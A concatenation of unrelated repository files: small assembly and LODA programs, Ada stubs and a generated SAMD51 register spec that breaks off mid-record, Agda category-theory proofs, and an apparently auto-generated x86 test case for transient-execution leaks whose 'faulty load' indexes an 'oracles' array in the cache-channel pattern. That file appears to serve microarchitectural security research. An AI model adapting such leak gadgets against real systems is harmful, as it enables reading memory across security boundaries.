tests/load-store.asm	tcort/lmc	2	161510	<reponame>tcort/lmc<filename>tests/load-store.asm INP ; get the first input STA FIRST ; store it in FIRST INP ; get the second input STA SECOND ; store it in SECOND LDA FIRST ; load FIRST OUT ; output value LDA SECOND ; load SECOND OUT ; output value HLT ; end of program FIRST DAT ; storage SECOND DAT ; storage
programs/oeis/071/A071178.asm	neoneye/loda	22	98705	<gh_stars>10-100 ; A071178: Exponent of the largest prime factor of n. ; 0,1,1,2,1,1,1,3,2,1,1,1,1,1,1,4,1,2,1,1,1,1,1,1,2,1,3,1,1,1,1,5,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,2,2,1,1,1,3,1,1,1,1,1,1,1,1,1,6,1,1,1,1,1,1,1,2,1,1,2,1,1,1,1,1,4,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,1,2 add $0,1 mov $2,2 mov $3,$0 mov $4,$0 lpb $3 mov $1,0 mov $5,$4 lpb $5 add $1,1 mov $6,$0 div $0,$2 trn $3,5 mod $6,$2 cmp $6,0 sub $5,$6 lpe add $2,1 mov $6,$0 cmp $6,1 cmp $6,0 sub $3,$6 lpe mov $0,$1
tests/ships-test_data-tests-crew_container.ads	thindil/steamsky	80	25597	<filename>tests/ships-test_data-tests-crew_container.ads<gh_stars>10-100 package Ships.Test_Data.Tests.Crew_Container is end Ships.Test_Data.Tests.Crew_Container;
Pruebas/HolaMundo.adb	Arles96/PCompiladores	0	1045	procedure HolaMundo is begin put("<NAME>"); end HolaMundo;
test/Fail/Issue875.agda	shlevy/agda	1,989	13050	postulate A : Set P : ..(_ : A) → Set f : {x : A} → P x g : ..(x : A) → P x g x = f
UpTo-Properties/UpToColim.agda	hbasold/Sandbox	0	1240	<reponame>hbasold/Sandbox -- \| In this module, we proof that the 2-category of endofunctors -- inherits locally all colimits from underlying category. -- More precisely, for a functor F : C → C, we compute in Endo(F, F) -- colimits point-wise from those in C. module UpToColim where open import Level open import Relation.Binary using (Rel; IsEquivalence) open import Data.Product open import Categories.Support.Equivalence open import Categories.Category open import Categories.2-Category open import Categories.Functor open import Categories.NaturalTransformation renaming (id to natId; _≡_ to _≡N_; setoid to natSetoid) hiding (_∘ˡ_; _∘ʳ_) open import Categories.Support.EqReasoning open import Categories.Colimit open import Categories.Cocones open import Categories.Cocone open import Categories.Object.Initial open import Categories.Functor.Constant open import NaturalTransFacts open import UpTo -- _⇒_ = NaturalTransformation EndoDiagram : (C : Cat₀) → (F : EndoFunctor C) → (I : Cat₀) → Set EndoDiagram C F I = Functor I (EndoMor (C , F) (C , F)) PW-Diagram : {C : Cat₀} → {F : EndoFunctor C} → {I : Cat₀} → EndoDiagram C F I → (X : Category.Obj C) → Functor I C PW-Diagram {C} {F} {I} D X = record { F₀ = λ i → Functor.F₀ (Endo⇒.T (D.F₀ i)) X ; F₁ = λ h → NaturalTransformation.η (UpTo⇒.γ (D.F₁ h)) X ; identity = ≡U-proof D.identity ; homomorphism = ≡U-proof D.homomorphism ; F-resp-≡ = λ x → ≡U-proof (D.F-resp-≡ x) } where module C = Category C module D = Functor D module I = Category I open _≡U_ EndoMor-inherit-colim : {C : Cat₀} → (F : EndoFunctor C) → {I : Cat₀} → (D : EndoDiagram C F I) → ((X : Category.Obj C) → Colimit (PW-Diagram D X)) → Colimit D EndoMor-inherit-colim {C} F {I} D c = record { initial = record { ⊥ = colim-D ; ! = out ; !-unique = out-unique } } where -- Notations module C = Category C module I = Category I module CC-D = Category (Cocones D) -- Components of F F₀ = Functor.F₀ F F₁ = Functor.F₁ F -- Components of the diagram D D₀ = Functor.F₀ D D₁ = Functor.F₁ D -- Tᵢ = π₁(D(i)) T : (i : I.Obj) → Functor C C T i = Endo⇒.T (D₀ i) -- Components of T T₀ = λ i → Functor.F₀ (T i) T₁ = λ i {A} {B} → Functor.F₁ (T i) {A} {B} -- ρ‌ᵢA = π₂(D(i)) ρ : (i : I.Obj) → (T i ∘ F) ⇒ (F ∘ T i) ρ i = Endo⇒.ρ (D₀ i) ρη : (i : I.Obj) → (A : C.Obj) → C [ T₀ i (F₀ A) , F₀ (T₀ i A) ] ρη i A = NaturalTransformation.η (ρ i) A -- The natural transformation (w/o proof) D(f) : D(i) ⇒ D(i) D₁η : ∀ {i j} → (f : I [ i , j ]) → (A : C.Obj) → C [ T₀ i A , T₀ j A ] D₁η f A = NaturalTransformation.η (UpTo⇒.γ (D₁ f)) A ----- Construction of the colimit ----- -- It is given by the cocone (colim-T, ρ). -- Action of colim-T on objects colim-T₀ : C.Obj → C.Obj colim-T₀ A = CL.∃F where module CL = Colimit (c A) -- Injection into colim DX κ : (i : I.Obj) → (X : C.Obj) → C [ T₀ i X , Colimit.∃F (c X) ] κ i X = Colimit.Ic.ψ (c X) i -- Given a morphism u : A → B in C, we construct a cocone DA ⇒ colim DB, -- which will give us then T(u) by the universal property of colim DA. -- The components of the cocone are given by κBᵢ ∘ Tᵢ(u) : T₁(A) → colim DB, -- where we use that Tᵢ(A) = DA(i). cocone-T₁ : {A B : C.Obj} → C [ A , B ] → Category.Obj (Cocones (PW-Diagram D A)) cocone-T₁ {A} {B} u = record { N = colim-T₀ B ; ψ = λ i → C [ κB i ∘ T₁ i u ] ; commute = comm } where module CA = Colimit (c A) module PW-Cocones-A = Category (Cocones (PW-Diagram D A)) module CB = Colimit (c B) DA = PW-Diagram D A module DA = Functor DA DB = PW-Diagram D B module DB = Functor DB -- Injection into colim DB κB : (i : I.Obj) → C [ T₀ i B , CB.∃F ] κB i = NaturalTransformation.η CB.ι i .comm : {i j : I.Obj} (f : I [ i , j ]) → C [ κB i ∘ T₁ i u ] C.≡ C [ κB j ∘ T₁ j u ] C.∘ DA.F₁ f comm {i} {j} f = begin C [ κB i ∘ T₁ i u ] ↓⟨ C.∘-resp-≡ˡ (Colimit.Ic.commute (c B) f) ⟩ (κB j C.∘ DB.F₁ f) C.∘ T₁ i u ↓⟨ C.assoc ⟩ κB j C.∘ (DB.F₁ f C.∘ T₁ i u) ↓⟨ C.∘-resp-≡ʳ (NaturalTransformation.commute (UpTo⇒.γ (D₁ f)) u) ⟩ κB j C.∘ (T₁ j u C.∘ DA.F₁ f) ↑⟨ C.assoc ⟩ C [ κB j ∘ T₁ j u ] C.∘ DA.F₁ f ∎ where open SetoidReasoning (C.hom-setoid {DA.F₀ i} {colim-T₀ B}) -- Action of colim-T on morphisms colim-T₁ : {A B : C.Obj} → C [ A , B ] → C [ colim-T₀ A , colim-T₀ B ] colim-T₁ {A} {B} u = CoconeMorphism.f (CA.I.! {cocone-T₁ u}) where module CA = Colimit (c A) -- Proof that T(id_A) = id_{T(A)} .colim-T-id : ∀ {A : C.Obj} → C [ colim-T₁ (C.id {A}) ≡ C.id {colim-T₀ A} ] colim-T-id {A} = CA.I.⊥-id (record { f = colim-T₁ (C.id {A}) ; commute = λ {i} → let open SetoidReasoning (C.hom-setoid {DA.F₀ i} {colim-T₀ A}) in begin C [ colim-T₁ (C.id {A}) ∘ κ i A ] -- colimit property of T(id) = [κ i A ∘ id]_{i ∈ I} ↓⟨ CoconeMorphism.commute (CA.I.! {cocone-T₁ (C.id {A})}) ⟩ C [ κ i A ∘ T₁ i (C.id {A}) ] -- Functoriality of Tᵢ ↓⟨ C.∘-resp-≡ʳ (Functor.identity (T i)) ⟩ C [ κ i A ∘ C.id {T₀ i A} ] ↓⟨ C.identityʳ ⟩ κ i A ∎ }) where module CA = Colimit (c A) module DA = Functor (PW-Diagram D A) -- Proof that T(g ∘ f) = Tg ∘ Tf .colim-T-hom : {X Y Z : C.Obj} {f : C [ X , Y ]} {g : C [ Y , Z ]} → colim-T₁ (C [ g ∘ f ]) C.≡ C [ colim-T₁ g ∘ colim-T₁ f ] colim-T-hom {X} {Y} {Z} {f} {g} = CX.I.!-unique CX⇒TgTf where module CX = Colimit (c X) module CY = Colimit (c Y) module DX = Functor (PW-Diagram D X) module CC-DX = Category (Cocones (PW-Diagram D X)) -- Show that Tg ∘ Tf is a cocone for T(g ∘ f), which implies that -- Tg ∘ Tf = T(g ∘ f). -- To achieve this, we need to show that for each i ∈ I, we have -- Tg ∘ Tf ∘ κ i X = κ i Z ∘ Tᵢ (g ∘ f). CX⇒TgTf : Colimit.I.⊥ (c X) CC-DX.⇒ cocone-T₁ (C [ g ∘ f ]) CX⇒TgTf = record { f = C [ colim-T₁ g ∘ colim-T₁ f ] ; commute = λ {i : I.Obj} → let open SetoidReasoning (C.hom-setoid {DX.F₀ i} {colim-T₀ Z}) in begin C [ colim-T₁ g ∘ colim-T₁ f ] C.∘ κ i X ↓⟨ C.assoc ⟩ colim-T₁ g C.∘ (colim-T₁ f C.∘ κ i X) ↓⟨ C.∘-resp-≡ʳ (CoconeMorphism.commute (CX.I.! {cocone-T₁ f})) ⟩ colim-T₁ g C.∘ (κ i Y C.∘ T₁ i f) ↑⟨ C.assoc ⟩ (colim-T₁ g C.∘ κ i Y) C.∘ T₁ i f ↓⟨ C.∘-resp-≡ˡ (CoconeMorphism.commute (CY.I.! {cocone-T₁ g})) ⟩ (κ i Z C.∘ T₁ i g) C.∘ T₁ i f ↓⟨ C.assoc ⟩ κ i Z C.∘ (T₁ i g C.∘ T₁ i f) ↑⟨ C.∘-resp-≡ʳ (Functor.homomorphism (T i)) ⟩ C [ κ i Z ∘ T₁ i (g C.∘ f) ] ∎ } -- Proof that T respects the equality of C. .colim-T-resp-≡ : {A B : C.Obj} {f : C [ A , B ]} {g : C [ A , B ]} → C [ f ≡ g ] → C [ colim-T₁ f ≡ colim-T₁ g ] colim-T-resp-≡ {A} {B} {f} {g} f≡g = CA.I.!-unique CA⇒Tg where module CA = Colimit (c A) module DA = Functor (PW-Diagram D A) module CC-DA = Category (Cocones (PW-Diagram D A)) -- That T respects ≡ is inherited point-wise from the fact that -- each Tᵢ respects ≡. CA⇒Tg : Colimit.I.⊥ (c A) CC-DA.⇒ cocone-T₁ f CA⇒Tg = record { f = colim-T₁ g ; commute = λ {i} → let open SetoidReasoning (C.hom-setoid {DA.F₀ i} {colim-T₀ B}) in begin C [ colim-T₁ g ∘ κ i A ] ↓⟨ CoconeMorphism.commute (CA.I.! {cocone-T₁ g}) ⟩ C [ κ i B ∘ T₁ i g ] ↑⟨ C.∘-resp-≡ʳ (Functor.F-resp-≡ (T i) f≡g) ⟩ C [ κ i B ∘ T₁ i f ] ∎ } -- The colimiting up-to technique colim-T : Functor C C colim-T = record { F₀ = colim-T₀ ; F₁ = colim-T₁ ; identity = colim-T-id ; homomorphism = colim-T-hom ; F-resp-≡ = colim-T-resp-≡ } -- Cocone to construct ρ = [F₁ (κᵢ A) ∘ ρᵢ A]_{i ‌∈ I} cocone-ρ : {A : C.Obj} → Category.Obj (Cocones (PW-Diagram D (F₀ A))) cocone-ρ {A} = record { N = F₀ (colim-T₀ A) ; ψ = λ i → C [ F₁ (κ i A) ∘ ρη i A ] ; commute = λ {i} {j} f → let open SetoidReasoning (C.hom-setoid {T₀ i (F₀ A)} {F₀ (colim-T₀ A)}) in begin C [ F₁ (κ i A) ∘ ρη i A ] ↓⟨ C.∘-resp-≡ˡ (Functor.F-resp-≡ F (CA.Ic.commute f)) ⟩ C [ F₁ ((κ j A) C.∘ (DA.F₁ f)) ∘ ρη i A ] ↓⟨ C.∘-resp-≡ˡ (Functor.homomorphism F) ⟩ C [ C [ F₁ (κ j A) ∘ F₁ (DA.F₁ f) ] ∘ ρη i A ] ↓⟨ C.assoc ⟩ C [ F₁ (κ j A) ∘ C [ F₁ (DA.F₁ f) ∘ ρη i A ] ] ↓⟨ C.∘-resp-≡ʳ (lemma f) ⟩ C [ F₁ (κ j A) ∘ C [ ρη j A ∘ DFA.F₁ f ] ] ↑⟨ C.assoc ⟩ C [ F₁ (κ j A) ∘ ρη j A ] C.∘ DFA.F₁ f ∎ } where module CA = Colimit (c A) module DA = Functor (PW-Diagram D A) module DFA = Functor (PW-Diagram D (F₀ A)) -- Lemma to turn the commuting square for ρ into the equation we need .lemma : {i j : I.Obj} → (f : I [ i , j ]) → C [ F₁ (DA.F₁ f) ∘ ρη i A ] C.≡ C [ ρη j A ∘ DFA.F₁ f ] lemma {i} {j} f = begin C [ F₁ (DA.F₁ f) ∘ ρη i A ] ↑⟨ C.∘-resp-≡ˡ C.identityʳ ⟩ C [ C [ F₁ (DA.F₁ f) ∘ C.id {F₀ (DA.F₀ i)} ] ∘ ρη i A ] ↑⟨ UpTo⇒.square (D₁ f) {A} ⟩ C [ ρη j A ∘ C [ T₁ j (C.id {F₀ A}) ∘ (DFA.F₁ f) ] ] ↓⟨ C.∘-resp-≡ʳ (C.∘-resp-≡ˡ (Functor.identity (T j))) ⟩ C [ ρη j A ∘ C [ C.id {T₀ j (F₀ A)} ∘ (DFA.F₁ f) ] ] ↓⟨ C.∘-resp-≡ʳ C.identityˡ ⟩ C [ ρη j A ∘ DFA.F₁ f ] ∎ where open SetoidReasoning (C.hom-setoid {T₀ i (F₀ A)} {F₀ (T₀ j A)}) colim-ρ-η : (A : C.Obj) → C [ colim-T₀ (F₀ A) , F₀ (colim-T₀ A) ] colim-ρ-η A = CoconeMorphism.f (CFA.I.! {cocone-ρ}) where module CFA = Colimit (c (F₀ A)) -- Natural transformation to make colim-T indeed an up-to technique colim-ρ : (colim-T ∘ F) ⇒ (F ∘ colim-T) colim-ρ = record { η = colim-ρ-η ; commute = λ {A} {B} f → let open SetoidReasoning (C.hom-setoid {colim-T₀ (F₀ A)} {F₀ (colim-T₀ B)}) in begin C [ colim-ρ-η B ∘ colim-T₁ (F₁ f) ] ↓⟨ {!!} ⟩ C [ F₁ (colim-T₁ f) ∘ colim-ρ-η A ] ∎ } where colim-Endo : Endo⇒ C F C F colim-Endo = record { T = colim-T ; ρ = colim-ρ } colim-ψ : (i : I.Obj) → UpTo⇒ (D₀ i) colim-Endo colim-ψ i = record { γ = record { η = λ X → κ i X ; commute = {!!} } ; square = {!!} } colim-D : CC-D.Obj colim-D = record { N = colim-Endo ; ψ = colim-ψ ; commute = {!!} } out : ∀ {A : CC-D.Obj} → colim-D CC-D.⇒ A out = {!!} out-unique : {A : CC-D.Obj} (f : colim-D CC-D.⇒ A) → out CC-D.≡ f out-unique = {!!}
Transynther/x86/_processed/NONE/_zr_/i7-7700_9_0x48.log_21829_1639.asm	ljhsiun2/medusa	9	23017	.global s_prepare_buffers s_prepare_buffers: push %r14 push %r15 push %r9 push %rax push %rbp push %rdx push %rsi lea addresses_A_ht+0x3cab, %r9 nop sub %rax, %rax movl $0x61626364, (%r9) add $57575, %r15 lea addresses_WC_ht+0x1ed2b, %r15 nop inc %rsi mov (%r15), %r14w and %rbp, %rbp lea addresses_UC_ht+0x19b6b, %rbp nop nop nop nop nop and $37769, %rdx movb (%rbp), %al nop nop xor $7605, %r14 lea addresses_A_ht+0x14959, %rax nop nop mfence mov (%rax), %rsi nop nop dec %r14 lea addresses_WC_ht+0xe72b, %rsi clflush (%rsi) cmp %r15, %r15 mov $0x6162636465666768, %r14 movq %r14, %xmm2 movups %xmm2, (%rsi) nop add $40385, %rax lea addresses_A_ht+0x2eeb, %rdx nop nop nop and %r14, %r14 mov (%rdx), %r9d nop nop cmp $27275, %r15 lea addresses_WC_ht+0x1b75b, %rdx nop xor %rax, %rax mov $0x6162636465666768, %r15 movq %r15, %xmm0 vmovups %ymm0, (%rdx) nop and %r9, %r9 lea addresses_A_ht+0x4a2b, %rsi cmp $16221, %r14 mov (%rsi), %ax nop nop nop nop nop cmp $63801, %r14 lea addresses_normal_ht+0x1e16b, %rbp nop and $33008, %r15 mov $0x6162636465666768, %r9 movq %r9, %xmm7 vmovups %ymm7, (%rbp) nop add %rsi, %rsi lea addresses_UC_ht+0x1326b, %r9 nop add %rsi, %rsi mov (%r9), %rdx nop nop nop sub %rax, %rax lea addresses_normal_ht+0x1ecab, %r15 add $43418, %rax mov (%r15), %rdx cmp %rsi, %rsi pop %rsi pop %rdx pop %rbp pop %rax pop %r9 pop %r15 pop %r14 ret .global s_faulty_load s_faulty_load: push %r10 push %r12 push %r13 push %r9 push %rbp push %rbx push %rsi // Store lea addresses_US+0x10fcb, %r13 nop xor $24563, %r9 movw $0x5152, (%r13) nop nop nop xor %r10, %r10 // Faulty Load lea addresses_WT+0xecab, %rbx and $55445, %r12 mov (%rbx), %r13w lea oracles, %rbp and $0xff, %r13 shlq $12, %r13 mov (%rbp,%r13,1), %r13 pop %rsi pop %rbx pop %rbp pop %r9 pop %r13 pop %r12 pop %r10 ret /* <gen_faulty_load> [REF] {'OP': 'LOAD', 'src': {'type': 'addresses_WT', 'AVXalign': False, 'congruent': 0, 'size': 16, 'same': False, 'NT': True}} {'OP': 'STOR', 'dst': {'type': 'addresses_US', 'AVXalign': False, 'congruent': 3, 'size': 2, 'same': False, 'NT': False}} [Faulty Load] {'OP': 'LOAD', 'src': {'type': 'addresses_WT', 'AVXalign': False, 'congruent': 0, 'size': 2, 'same': True, 'NT': False}} <gen_prepare_buffer> {'OP': 'STOR', 'dst': {'type': 'addresses_A_ht', 'AVXalign': False, 'congruent': 11, 'size': 4, 'same': False, 'NT': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_WC_ht', 'AVXalign': False, 'congruent': 6, 'size': 2, 'same': False, 'NT': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_UC_ht', 'AVXalign': False, 'congruent': 4, 'size': 1, 'same': False, 'NT': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_A_ht', 'AVXalign': False, 'congruent': 0, 'size': 8, 'same': False, 'NT': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'AVXalign': False, 'congruent': 5, 'size': 16, 'same': False, 'NT': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_A_ht', 'AVXalign': False, 'congruent': 4, 'size': 4, 'same': False, 'NT': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'AVXalign': False, 'congruent': 4, 'size': 32, 'same': False, 'NT': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_A_ht', 'AVXalign': False, 'congruent': 7, 'size': 2, 'same': True, 'NT': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_normal_ht', 'AVXalign': False, 'congruent': 5, 'size': 32, 'same': False, 'NT': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_UC_ht', 'AVXalign': False, 'congruent': 1, 'size': 8, 'same': True, 'NT': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_normal_ht', 'AVXalign': False, 'congruent': 11, 'size': 8, 'same': False, 'NT': True}} {'00': 21829} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 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00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */
src/svd/sam_svd-evsys.ads	Fabien-Chouteau/samd51-hal	1	8340	<reponame>Fabien-Chouteau/samd51-hal pragma Style_Checks (Off); -- This spec has been automatically generated from ATSAMD51G19A.svd pragma Restrictions (No_Elaboration_Code); with HAL; with System; package SAM_SVD.EVSYS is pragma Preelaborate; --------------- -- Registers -- --------------- -- Control type EVSYS_CTRLA_Register is record -- Software Reset SWRST : Boolean := False; -- unspecified Reserved_1_7 : HAL.UInt7 := 16#0#; end record with Volatile_Full_Access, Object_Size => 8, Bit_Order => System.Low_Order_First; for EVSYS_CTRLA_Register use record SWRST at 0 range 0 .. 0; Reserved_1_7 at 0 range 1 .. 7; end record; -- EVSYS_SWEVT_CHANNEL array type EVSYS_SWEVT_CHANNEL_Field_Array is array (0 .. 31) of Boolean with Component_Size => 1, Size => 32; -- Software Event type EVSYS_SWEVT_Register (As_Array : Boolean := False) is record case As_Array is when False => -- CHANNEL as a value Val : HAL.UInt32; when True => -- CHANNEL as an array Arr : EVSYS_SWEVT_CHANNEL_Field_Array; end case; end record with Unchecked_Union, Size => 32, Volatile_Full_Access, Object_Size => 32, Bit_Order => System.Low_Order_First; for EVSYS_SWEVT_Register use record Val at 0 range 0 .. 31; Arr at 0 range 0 .. 31; end record; subtype EVSYS_PRICTRL_PRI_Field is HAL.UInt4; -- Priority Control type EVSYS_PRICTRL_Register is record -- Channel Priority Number PRI : EVSYS_PRICTRL_PRI_Field := 16#0#; -- unspecified Reserved_4_6 : HAL.UInt3 := 16#0#; -- Round-Robin Scheduling Enable RREN : Boolean := False; end record with Volatile_Full_Access, Object_Size => 8, Bit_Order => System.Low_Order_First; for EVSYS_PRICTRL_Register use record PRI at 0 range 0 .. 3; Reserved_4_6 at 0 range 4 .. 6; RREN at 0 range 7 .. 7; end record; subtype EVSYS_INTPEND_ID_Field is HAL.UInt4; -- Channel Pending Interrupt type EVSYS_INTPEND_Register is record -- Channel ID ID : EVSYS_INTPEND_ID_Field := 16#0#; -- unspecified Reserved_4_7 : HAL.UInt4 := 16#0#; -- Channel Overrun OVR : Boolean := False; -- Channel Event Detected EVD : Boolean := False; -- unspecified Reserved_10_13 : HAL.UInt4 := 16#0#; -- Ready READY : Boolean := True; -- Busy BUSY : Boolean := False; end record with Volatile_Full_Access, Object_Size => 16, Bit_Order => System.Low_Order_First; for EVSYS_INTPEND_Register use record ID at 0 range 0 .. 3; Reserved_4_7 at 0 range 4 .. 7; OVR at 0 range 8 .. 8; EVD at 0 range 9 .. 9; Reserved_10_13 at 0 range 10 .. 13; READY at 0 range 14 .. 14; BUSY at 0 range 15 .. 15; end record; -- EVSYS_INTSTATUS_CHINT array type EVSYS_INTSTATUS_CHINT_Field_Array is array (0 .. 11) of Boolean with Component_Size => 1, Size => 12; -- Type definition for EVSYS_INTSTATUS_CHINT type EVSYS_INTSTATUS_CHINT_Field (As_Array : Boolean := False) is record case As_Array is when False => -- CHINT as a value Val : HAL.UInt12; when True => -- CHINT as an array Arr : EVSYS_INTSTATUS_CHINT_Field_Array; end case; end record with Unchecked_Union, Size => 12; for EVSYS_INTSTATUS_CHINT_Field use record Val at 0 range 0 .. 11; Arr at 0 range 0 .. 11; end record; -- Interrupt Status type EVSYS_INTSTATUS_Register is record -- Read-only. Channel 0 Pending Interrupt CHINT : EVSYS_INTSTATUS_CHINT_Field; -- unspecified Reserved_12_31 : HAL.UInt20; end record with Volatile_Full_Access, Object_Size => 32, Bit_Order => System.Low_Order_First; for EVSYS_INTSTATUS_Register use record CHINT at 0 range 0 .. 11; Reserved_12_31 at 0 range 12 .. 31; end record; -- EVSYS_BUSYCH_BUSYCH array type EVSYS_BUSYCH_BUSYCH_Field_Array is array (0 .. 11) of Boolean with Component_Size => 1, Size => 12; -- Type definition for EVSYS_BUSYCH_BUSYCH type EVSYS_BUSYCH_BUSYCH_Field (As_Array : Boolean := False) is record case As_Array is when False => -- BUSYCH as a value Val : HAL.UInt12; when True => -- BUSYCH as an array Arr : EVSYS_BUSYCH_BUSYCH_Field_Array; end case; end record with Unchecked_Union, Size => 12; for EVSYS_BUSYCH_BUSYCH_Field use record Val at 0 range 0 .. 11; Arr at 0 range 0 .. 11; end record; -- Busy Channels type EVSYS_BUSYCH_Register is record -- Read-only. Busy Channel 0 BUSYCH : EVSYS_BUSYCH_BUSYCH_Field; -- unspecified Reserved_12_31 : HAL.UInt20; end record with Volatile_Full_Access, Object_Size => 32, Bit_Order => System.Low_Order_First; for EVSYS_BUSYCH_Register use record BUSYCH at 0 range 0 .. 11; Reserved_12_31 at 0 range 12 .. 31; end record; -- EVSYS_READYUSR_READYUSR array type EVSYS_READYUSR_READYUSR_Field_Array is array (0 .. 11) of Boolean with Component_Size => 1, Size => 12; -- Type definition for EVSYS_READYUSR_READYUSR type EVSYS_READYUSR_READYUSR_Field (As_Array : Boolean := False) is record case As_Array is when False => -- READYUSR as a value Val : HAL.UInt12; when True => -- READYUSR as an array Arr : EVSYS_READYUSR_READYUSR_Field_Array; end case; end record with Unchecked_Union, Size => 12; for EVSYS_READYUSR_READYUSR_Field use record Val at 0 range 0 .. 11; Arr at 0 range 0 .. 11; end record; -- Ready Users type EVSYS_READYUSR_Register is record -- Read-only. Ready User for Channel 0 READYUSR : EVSYS_READYUSR_READYUSR_Field; -- unspecified Reserved_12_31 : HAL.UInt20; end record with Volatile_Full_Access, Object_Size => 32, Bit_Order => System.Low_Order_First; for EVSYS_READYUSR_Register use record READYUSR at 0 range 0 .. 11; Reserved_12_31 at 0 range 12 .. 31; end record; --------------------------------------- -- EVSYS_CHANNEL cluster's Registers -- --------------------------------------- subtype EVSYS_CHANNEL_EVSYS_CHANNEL_EVGEN_Field is HAL.UInt7; -- Path Selection type CHANNEL_PATHSelect is (-- Synchronous path SYNCHRONOUS, -- Resynchronized path RESYNCHRONIZED, -- Asynchronous path ASYNCHRONOUS) with Size => 2; for CHANNEL_PATHSelect use (SYNCHRONOUS => 0, RESYNCHRONIZED => 1, ASYNCHRONOUS => 2); -- Edge Detection Selection type CHANNEL_EDGSELSelect is (-- No event output when using the resynchronized or synchronous path NO_EVT_OUTPUT, -- Event detection only on the rising edge of the signal from the event -- generator when using the resynchronized or synchronous path RISING_EDGE, -- Event detection only on the falling edge of the signal from the event -- generator when using the resynchronized or synchronous path FALLING_EDGE, -- Event detection on rising and falling edges of the signal from the event -- generator when using the resynchronized or synchronous path BOTH_EDGES) with Size => 2; for CHANNEL_EDGSELSelect use (NO_EVT_OUTPUT => 0, RISING_EDGE => 1, FALLING_EDGE => 2, BOTH_EDGES => 3); -- Channel n Control type EVSYS_CHANNEL_EVSYS_CHANNEL_Register is record -- Event Generator Selection EVGEN : EVSYS_CHANNEL_EVSYS_CHANNEL_EVGEN_Field := 16#0#; -- unspecified Reserved_7_7 : HAL.Bit := 16#0#; -- Path Selection PATH : CHANNEL_PATHSelect := SAM_SVD.EVSYS.SYNCHRONOUS; -- Edge Detection Selection EDGSEL : CHANNEL_EDGSELSelect := SAM_SVD.EVSYS.NO_EVT_OUTPUT; -- unspecified Reserved_12_13 : HAL.UInt2 := 16#0#; -- Run in standby RUNSTDBY : Boolean := False; -- Generic Clock On Demand ONDEMAND : Boolean := True; -- unspecified Reserved_16_31 : HAL.UInt16 := 16#0#; end record with Volatile_Full_Access, Object_Size => 32, Bit_Order => System.Low_Order_First; for EVSYS_CHANNEL_EVSYS_CHANNEL_Register use record EVGEN at 0 range 0 .. 6; Reserved_7_7 at 0 range 7 .. 7; PATH at 0 range 8 .. 9; EDGSEL at 0 range 10 .. 11; Reserved_12_13 at 0 range 12 .. 13; RUNSTDBY at 0 range 14 .. 14; ONDEMAND at 0 range 15 .. 15; Reserved_16_31 at 0 range 16 .. 31; end record; -- Channel n Interrupt Enable Clear type EVSYS_CHINTENCLR_EVSYS_CHANNEL_Register is record -- Channel Overrun Interrupt Disable OVR : Boolean := False; -- Channel Event Detected Interrupt Disable EVD : Boolean := False; -- unspecified Reserved_2_7 : HAL.UInt6 := 16#0#; end record with Volatile_Full_Access, Object_Size => 8, Bit_Order => System.Low_Order_First; for EVSYS_CHINTENCLR_EVSYS_CHANNEL_Register use record OVR at 0 range 0 .. 0; EVD at 0 range 1 .. 1; Reserved_2_7 at 0 range 2 .. 7; end record; -- Channel n Interrupt Enable Set type EVSYS_CHINTENSET_EVSYS_CHANNEL_Register is record -- Channel Overrun Interrupt Enable OVR : Boolean := False; -- Channel Event Detected Interrupt Enable EVD : Boolean := False; -- unspecified Reserved_2_7 : HAL.UInt6 := 16#0#; end 